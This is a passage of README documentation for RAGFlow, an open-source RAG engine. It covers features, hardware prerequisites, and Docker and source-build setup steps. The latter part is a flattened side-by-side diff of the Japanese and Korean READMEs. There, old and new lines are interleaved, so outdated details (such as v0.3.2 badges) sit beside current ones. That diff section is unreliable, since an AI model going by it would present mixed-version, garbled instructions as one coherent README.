        <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="Follow on X (Twitter)">
    </a>
    <a href="https://demo.ragflow.io" target="_blank">
        <img alt="Online Demo" src="https://img.shields.io/badge/Online-Demo-4e6b99">
    </a>
    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
        <img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
    </a>
    <a href="https://github.com/infiniflow/ragflow/releases/latest">
        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Rilis%20Terbaru" alt="Latest Release">
    </a>
    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
        <img height="21" src="https://img.shields.io/badge/Lisensi-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="License">
    </a>
    <a href="https://deepwiki.com/infiniflow/ragflow">
        <img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
    </a>
</p>

<h4 align="center">
  <a href="https://ragflow.io/docs/dev/">Documentation</a> |
  <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
  <a href="https://twitter.com/infiniflowai">Twitter</a> |
  <a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
  <a href="https://demo.ragflow.io">Demo</a>
</h4>
#

<details open>
<summary><b>📕 Table of Contents</b></summary>

- 💡 [What is RAGFlow?](#-apa-itu-ragflow)
- 🎮 [Demo](#-demo)
- 📌 [Latest Updates](#-pembaruan-terbaru)
- 🌟 [Key Features](#-fitur-utama)
- 🔎 [System Architecture](#-arsitektur-sistem)
- 🎬 [Get Started](#-mulai)
- 🔧 [Configurations](#-konfigurasi)
- 🔧 [Build a Docker image without embedding models](#-membangun-image-docker-tanpa-model-embedding)
- 🔧 [Build a Docker image with embedding models](#-membangun-image-docker-dengan-model-embedding)
- 🔨 [Launch the service from source for development](#-meluncurkan-aplikasi-dari-sumber-untuk-pengembangan)
- 📚 [Documentation](#-dokumentasi)
- 📜 [Roadmap](#-peta-jalan)
- 🏄 [Community](#-komunitas)
- 🙌 [Contributing](#-kontribusi)

</details>
## 💡 What is RAGFlow?

[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. The platform provides an efficient RAG workflow for businesses of any scale, combining LLMs (Large Language Models) to deliver truthful question-answering capabilities backed by references from complex structured data.

## 🎮 Demo

Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
</div>

## 🔥 Latest Updates

- 2025-08-01 Supports agentic workflows.
- 2025-05-23 Adds a Python/JS code executor component to Agent.
- 2025-05-05 Supports cross-language queries.
- 2025-03-19 Supports using a multi-modal model to understand images within PDF or DOCX files.
- 2025-02-28 Combined with Internet search (Tavily), supports deep research for any LLM.
- 2024-12-18 Upgrades the document layout analysis model in DeepDoc.
- 2024-08-22 Supports text-to-SQL through RAG.

## 🎉 Stay Tuned

⭐️ Star our repository to stay informed about exciting new features and improvements! 🌟

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
</div>
## 🌟 Key Features

### 🍭 **"Quality in, quality out"**

- Deep-document-understanding-based knowledge extraction from unstructured data with complicated formats.
- Finds the "needle in a data haystack" with virtually unlimited tokens.

### 🍱 **Template-based chunking**

- Intelligent and explainable.
- Plenty of templates to choose from.

### 🌱 **Grounded citations with reduced hallucinations**

- Visualized text chunking allows human intervention.
- Quick view of key references and traceable citations to support fact-grounded answers.

### 🍔 **Compatibility with heterogeneous data sources**

- Supports Word, slides, Excel, txt, images, scanned copies, structured data, web pages, and more.

### 🛀 **Automated and effortless RAG workflow**

- Streamlined RAG orchestration for small and large businesses alike.
- Configurable LLMs as well as embedding models.
- Multiple recall paired with fused re-ranking.
- Intuitive APIs for easy integration with business.

## 🔎 System Architecture

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
</div>
## 🎬 Get Started

### 📝 Prerequisites

- CPU >= 4 cores
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you want to use RAGFlow's code executor (sandbox) feature.

> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).

### 🚀 Start up the server

1. Ensure `vm.max_map_count` >= 262144:

> To check the value of `vm.max_map_count`:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> If the value is less than 262144, reset `vm.max_map_count` to at least 262144:
>
> ```bash
> # In this example, we set it to 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> This change is lost after a system reboot. To make it permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf**:
>
> ```bash
> vm.max_map_count=262144
> ```
2. Clone the repo:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
```

3. Start up the server using the pre-built Docker images:

> [!CAUTION]
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, [use this guide to build a Docker image compatible with your system](https://ragflow.io/docs/dev/build_docker_image).

> The command below downloads the `v0.20.0-slim` edition of the RAGFlow Docker image. See the table below for descriptions of the different RAGFlow editions. To download an edition other than `v0.20.0-slim`, update the `RAGFLOW_IMAGE` variable in **docker/.env** before using `docker compose` to start the server. For example, set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` for the full edition `v0.20.0`.

```bash
$ cd ragflow/docker
# Use CPU for embedding and DeepDoc tasks:
$ docker compose -f docker-compose.yml up -d

# To use GPU to accelerate embedding and DeepDoc tasks:
# docker compose -f docker-compose-gpu.yml up -d
```

| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
| ----------------- | --------------- | --------------------- | ------------------------ |
| v0.20.0           | ≈9              | :heavy_check_mark:    | Stable release           |
| v0.20.0-slim      | ≈2              | ❌                    | Stable release           |
| nightly           | ≈9              | :heavy_check_mark:    | _Unstable_ nightly build |
| nightly-slim      | ≈2              | ❌                    | _Unstable_ nightly build |

4. Check the server status after the server is up and running:

```bash
$ docker logs -f ragflow-server
```

_The following output confirms a successful launch of the system:_

```bash
     ____   ___    ______ ______ __
    / __ \ /   |  / ____// ____// /____  _      __
   / /_/ // /| | / / __ / /_   / // __ \| | /| / /
  / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
 /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/

 * Running on all addresses (0.0.0.0)
```
> If you skip this step and log in to RAGFlow directly, your browser may show a `network anomaly` error because RAGFlow may not be fully ready yet.

5. Open your web browser, enter the IP address of your server, and log in to RAGFlow.

> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**without** the port number), as the default HTTP serving port `80` can be omitted when using the default configurations.

6. In [service_conf.yaml.template](./docker/service_conf.yaml.template), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.

> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.

_The system is now ready to use!_
## 🔧 Configurations

For system configuration, you will need to manage the following files:

- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
- [service_conf.yaml.template](./docker/service_conf.yaml.template): Configures the back-end services.
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.

To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.

Updating these configurations requires a reboot of all containers to take effect:

> ```bash
> $ docker compose -f docker-compose.yml up -d
> ```
## 🔧 Build a Docker image without embedding models

This image is approximately 2 GB in size and relies on external LLM and embedding services.

```bash
git clone https://github.com/infiniflow/ragflow.git
cd ragflow/
docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
```

## 🔧 Build a Docker image including embedding models

This image is approximately 9 GB in size. As it includes embedding models, it relies on external LLM services only.

```bash
git clone https://github.com/infiniflow/ragflow.git
cd ragflow/
docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
```
## 🔨 Launch the service from source for development

1. Install uv and pre-commit, or skip this step if they are already installed:

```bash
pipx install uv pre-commit
```

2. Clone the source code and install Python dependencies:

```bash
git clone https://github.com/infiniflow/ragflow.git
cd ragflow/
uv sync --python 3.10 --all-extras  # install RAGFlow dependent python modules
uv run download_deps.py
pre-commit install
```

3. Launch the dependent services (MinIO, Elasticsearch, Redis, and MySQL) using Docker Compose:

```bash
docker compose -f docker/docker-compose-base.yml up -d
```

Add the following line to `/etc/hosts` to map all hosts specified in **conf/service_conf.yaml** to `127.0.0.1`:

```
127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
```

4. If you cannot access HuggingFace, set the `HF_ENDPOINT` environment variable to use a mirror site:

```bash
export HF_ENDPOINT=https://hf-mirror.com
```

5. If your operating system does not have jemalloc, install it as follows:

```bash
# Ubuntu
sudo apt-get install libjemalloc-dev
# CentOS
sudo yum install jemalloc
```

6. Launch the backend service:

```bash
source .venv/bin/activate
export PYTHONPATH=$(pwd)
bash docker/launch_backend_service.sh
```

7. Install frontend dependencies:

```bash
cd web
npm install
```

8. Launch the frontend service:

```bash
npm run dev
```

_The following output confirms a successful launch of the system:_

![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)

9. Stop the RAGFlow front-end and back-end services after development is complete:

```bash
pkill -f "ragflow_server.py|task_executor.py"
```
## 📚 Documentation

- [Quickstart](https://ragflow.io/docs/dev/)
- [Configuration](https://ragflow.io/docs/dev/configurations)
- [Release notes](https://ragflow.io/docs/dev/release_notes)
- [User guides](https://ragflow.io/docs/dev/category/guides)
- [Developer guides](https://ragflow.io/docs/dev/category/developers)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQs](https://ragflow.io/docs/dev/faq)

## 📜 Roadmap

See the [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214).

## 🏄 Community

- [Discord](https://discord.gg/NjYzJD3GM3)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 Contributing

RAGFlow grows through open-source collaboration. In this spirit, we welcome contributions from the community. If you would like to take part, please review our [Contribution Guidelines](https://ragflow.io/docs/dev/contributing) first.
# README_ja.md
<div align="center">
|
<div align="center">
|
||||||
<a href="https://demo.ragflow.io/">
|
<a href="https://demo.ragflow.io/">
|
||||||
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
||||||
</a>
|
</a>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<a href="./README.md">English</a> |
|
<a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
|
||||||
<a href="./README_zh.md">简体中文</a> |
|
<a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
|
||||||
<a href="./README_ja.md">日本語</a>
|
<a href="./README_tzh.md"><img alt="繁體中文版自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
|
||||||
</p>
|
<a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DBEDFA"></a>
|
||||||
|
<a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
|
||||||
<p align="center">
|
<a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
|
||||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
<a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
|
||||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
</p>
|
||||||
</a>
|
|
||||||
<a href="https://demo.ragflow.io" target="_blank">
|
<p align="center">
|
||||||
<img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
|
<a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
|
||||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
<img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
|
||||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.3.2-brightgreen"
|
</a>
|
||||||
alt="docker pull infiniflow/ragflow:v0.3.2"></a>
|
<a href="https://demo.ragflow.io" target="_blank">
|
||||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
|
||||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
|
</a>
|
||||||
</a>
|
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||||
</p>
|
<img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
|
||||||
|
</a>
|
||||||
## 💡 RAGFlow とは?
|
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||||
|
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||||
[RAGFlow](https://demo.ragflow.io) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
</a>
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||||
## 🌟 主な特徴
|
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||||
|
</a>
|
||||||
### 🍭 **"Quality in, quality out"**
|
<a href="https://deepwiki.com/infiniflow/ragflow">
|
||||||
|
<img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
|
||||||
- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
|
</a>
|
||||||
- 無限のトークンから"干し草の山の中の針"を見つける。
|
</p>
|
||||||
|
|
||||||
### 🍱 **テンプレートベースのチャンク化**
|
<h4 align="center">
|
||||||
|
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||||
- 知的で解釈しやすい。
|
<a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
|
||||||
- テンプレートオプションが豊富。
|
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||||
|
<a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
|
||||||
### 🌱 **ハルシネーションが軽減された根拠のある引用**
|
<a href="https://demo.ragflow.io">Demo</a>
|
||||||
|
</h4>
|
||||||
- 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
|
|
||||||
- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
|
#
## 💡 What is RAGFlow?

[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. By combining LLMs (Large Language Models), it delivers reliable question-answering capabilities backed by well-grounded citations drawn from data in a variety of complex formats, and provides a RAG workflow suited to businesses of any scale.

## 🎮 Demo

Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
</div>

## 🔥 Latest Updates

- 2025-08-01 Supports agentic workflows.
- 2025-05-23 Adds a Python/JS code executor component to Agent.
- 2025-05-05 Supports cross-language queries.
- 2025-03-19 Supports using multi-modal models to understand images within PDF or DOCX files.
- 2025-02-28 Combined with Internet search (Tavily), supports deep research for any LLM.
- 2024-12-18 Upgrades the document layout analysis model in DeepDoc.
- 2024-08-22 Supports text-to-SQL through RAG.

## 🎉 Stay Tuned

⭐️ Star our repository to stay up to date with exciting new features and updates! You'll receive instant notifications for every new release! 🌟

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
</div>
## 🌟 Key Features

### 🍭 **"Quality in, quality out"**

- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
- Finds the "needle in a haystack" across virtually unlimited tokens.

### 🍱 **Template-based chunking**

- Intelligent and explainable.
- Plenty of template options to choose from.

### 🌱 **Grounded citations with reduced hallucinations**

- Visualized text chunking that allows human intervention.
- Quick view of the key references and traceable citations to support grounded answers.

### 🍔 **Compatibility with heterogeneous data sources**

- Supports Word, slides, Excel, txt, images, scanned copies, structured data, web pages, and more.

### 🛀 **Automated and effortless RAG workflow**

- RAG orchestration that works for individuals as well as large enterprises.
- Configurable LLMs and embedding models.
- Multiple recall paired with fused re-ranking.
- Intuitive APIs for seamless integration with business.

## 🔎 System Architecture

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
</div>
## 🎬 Get Started

### 📝 Prerequisites

- CPU >= 4 cores
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use RAGFlow's code executor (sandbox) feature.

> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).

### 🚀 Start up the server

1. Ensure `vm.max_map_count` >= 262144:

> To check the value of `vm.max_map_count`:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> Reset `vm.max_map_count` to a value of at least 262144 if it is not:
>
> ```bash
> # In this case, we set it to 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> This change is reset after a system reboot. To make it permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
>
> ```bash
> vm.max_map_count=262144
> ```

2. Clone the repo:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
```
3. Start up the server using the pre-built Docker images:

> [!CAUTION]
> All officially provided Docker images are currently built for the x86 architecture; Docker images for ARM64 are not offered.
> If you are on an ARM64 operating system, refer to [this document](https://ragflow.io/docs/dev/build_docker_image) to build a Docker image yourself.

> The command below downloads the `v0.20.0-slim` edition of the RAGFlow Docker image. See the table below for descriptions of the different RAGFlow editions. To download an edition other than `v0.20.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example, set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` to download the full edition `v0.20.0`.

```bash
$ cd ragflow/docker
# Use CPU for embedding and DeepDoc tasks:
$ docker compose -f docker-compose.yml up -d

# To use GPU to accelerate embedding and DeepDoc tasks:
# docker compose -f docker-compose-gpu.yml up -d
```

| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
| ----------------- | --------------- | --------------------- | ------------------------ |
| v0.20.0           | ≈9              | :heavy_check_mark:    | Stable release           |
| v0.20.0-slim      | ≈2              | ❌                    | Stable release           |
| nightly           | ≈9              | :heavy_check_mark:    | _Unstable_ nightly build |
| nightly-slim      | ≈2              | ❌                    | _Unstable_ nightly build |
4. Check the server status after having the server up and running:

```bash
$ docker logs -f ragflow-server
```

_The following output confirms a successful launch of the system:_

```bash
     ____   ___    ______ ______ __
    / __ \ /   |  / ____// ____// /____  _      __
   / /_/ // /| | / / __ / /_   / // __ \| | /| / /
  / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
 /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/

 * Running on all addresses (0.0.0.0)
```

> If you skip this confirmation step and log in to RAGFlow directly, your browser may show a network-anomaly error because RAGFlow may not be fully initialized at that moment.

5. In your web browser, enter the IP address of your server as prompted and log in to RAGFlow.

> When using the default configurations, the default HTTP serving port `80` can be omitted, so you only need to enter `http://IP_OF_YOUR_MACHINE` (without the port number).

6. In [service_conf.yaml.template](./docker/service_conf.yaml.template), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.

> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.

_Setup is now complete! The show is on!_
## 🔧 Configurations

When it comes to system configurations, you will need to manage the following files:

- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
- [service_conf.yaml.template](./docker/service_conf.yaml.template): Configures the back-end services.
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.

You must ensure that changes to the [.env](./docker/.env) file are consistent with the contents of the [service_conf.yaml.template](./docker/service_conf.yaml.template) file.

> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, which can be used as `${ENV_VARS}` in the [service_conf.yaml.template](./docker/service_conf.yaml.template) file.

To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.

> A system reboot is required for all configuration updates to take effect:
>
> ```bash
> $ docker compose -f docker-compose.yml up -d
> ```
### Switch doc engine from Elasticsearch to Infinity

RAGFlow uses Elasticsearch by default for storing full text and vectors. To switch to [Infinity](https://github.com/infiniflow/infinity/), follow these steps:

1. Stop all running containers:

```bash
$ docker compose -f docker/docker-compose.yml down -v
```

Note: `-v` deletes the Docker container volumes, clearing the existing data.

2. Set `DOC_ENGINE` in **docker/.env** to `infinity`.

3. Start the containers:

```bash
$ docker compose -f docker-compose.yml up -d
```

> [!WARNING]
> Switching to Infinity on a Linux/arm64 machine is not officially supported.
## 🔧 Build a Docker image from source without embedding models

This Docker image is approximately 2 GB in size and relies on external LLM and embedding services.

```bash
git clone https://github.com/infiniflow/ragflow.git
cd ragflow/
docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
```

## 🔧 Build a Docker image from source including embedding models

This Docker image is approximately 9 GB in size. As it includes embedding models, it only relies on external LLM services.

```bash
git clone https://github.com/infiniflow/ragflow.git
cd ragflow/
docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
```
## 🔨 ソースコードからサービスを起動する方法
|
||||||
|
|
||||||
|
1. uv をインストールする。すでにインストールされている場合は、このステップをスキップしてください:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pipx install uv pre-commit
|
||||||
|
```
|
||||||
|
|
||||||
|
2. ソースコードをクローンし、Python の依存関係をインストールする:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
|
||||||
|
uv run download_deps.py
|
||||||
|
pre-commit install
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Docker Compose を使用して依存サービス(MinIO、Elasticsearch、Redis、MySQL)を起動する:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
docker compose -f docker/docker-compose-base.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
`/etc/hosts` に以下の行を追加して、**conf/service_conf.yaml** に指定されたすべてのホストを `127.0.0.1` に解決します:
|
||||||
|
|
||||||
|
```
|
||||||
|
127.0.0.1 es01 infinity mysql minio redis sandbox-executor-manager
|
||||||
|
```
|
||||||
|
|
||||||
|
4. HuggingFace にアクセスできない場合は、`HF_ENDPOINT` 環境変数を設定してミラーサイトを使用してください:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
export HF_ENDPOINT=https://hf-mirror.com
|
||||||
|
```
|
||||||
|
|
||||||
|
5. オペレーティングシステムにjemallocがない場合は、次のようにインストールします:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# ubuntu
|
||||||
|
sudo apt-get install libjemalloc-dev
|
||||||
|
# centos
|
||||||
|
sudo yum install jemalloc
|
||||||
|
```
|
||||||
|
|
||||||
|
6. バックエンドサービスを起動する:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
source .venv/bin/activate
|
||||||
|
export PYTHONPATH=$(pwd)
|
||||||
|
bash docker/launch_backend_service.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
7. フロントエンドの依存関係をインストールする:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cd web
|
||||||
|
npm install
|
||||||
|
```
|
||||||
|
|
||||||
|
8. フロントエンドサービスを起動する:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
npm run dev
|
||||||
|
```
|
||||||
|
|
||||||
|
_以下の画面は、システムが正常に起動したことを示します:_
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
9. 開発が完了したら、RAGFlow のフロントエンド サービスとバックエンド サービスを停止します:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pkill -f "ragflow_server.py|task_executor.py"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## 📚 ドキュメンテーション
|
||||||
|
|
||||||
|
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||||
|
- [Configuration](https://ragflow.io/docs/dev/configurations)
|
||||||
|
- [Release notes](https://ragflow.io/docs/dev/release_notes)
|
||||||
|
- [User guides](https://ragflow.io/docs/dev/category/guides)
|
||||||
|
- [Developer guides](https://ragflow.io/docs/dev/category/developers)
|
||||||
|
- [References](https://ragflow.io/docs/dev/category/references)
|
||||||
|
- [FAQs](https://ragflow.io/docs/dev/faq)
|
||||||
|
|
||||||
|
## 📜 ロードマップ
|
||||||
|
|
||||||
|
[RAGFlow ロードマップ 2025](https://github.com/infiniflow/ragflow/issues/4214) を参照してください。
|
||||||
|
|
||||||
|
## 🏄 コミュニティ
|
||||||
|
|
||||||
|
- [Discord](https://discord.gg/NjYzJD3GM3)
|
||||||
|
- [Twitter](https://twitter.com/infiniflowai)
|
||||||
|
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||||
|
|
||||||
|
## 🙌 コントリビュート
|
||||||
|
|
||||||
|
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず [コントリビューションガイド](https://ragflow.io/docs/dev/contributing)をご覧ください。
|
||||||
|
README_ko.md (new file)
@@ -0,0 +1,364 @@
|
|||||||
|
<div align="center">
|
||||||
|
<a href="https://demo.ragflow.io/">
|
||||||
|
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
||||||
|
</a>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<p align="center">
|
||||||
|
<a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
|
||||||
|
<a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
|
||||||
|
<a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
|
||||||
|
<a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
|
||||||
|
<a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DBEDFA"></a>
|
||||||
|
<a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
|
||||||
|
<a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<p align="center">
|
||||||
|
<a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
|
||||||
|
<img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
|
||||||
|
</a>
|
||||||
|
<a href="https://demo.ragflow.io" target="_blank">
|
||||||
|
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
|
||||||
|
</a>
|
||||||
|
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||||
|
<img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
|
||||||
|
</a>
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||||
|
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||||
|
</a>
|
||||||
|
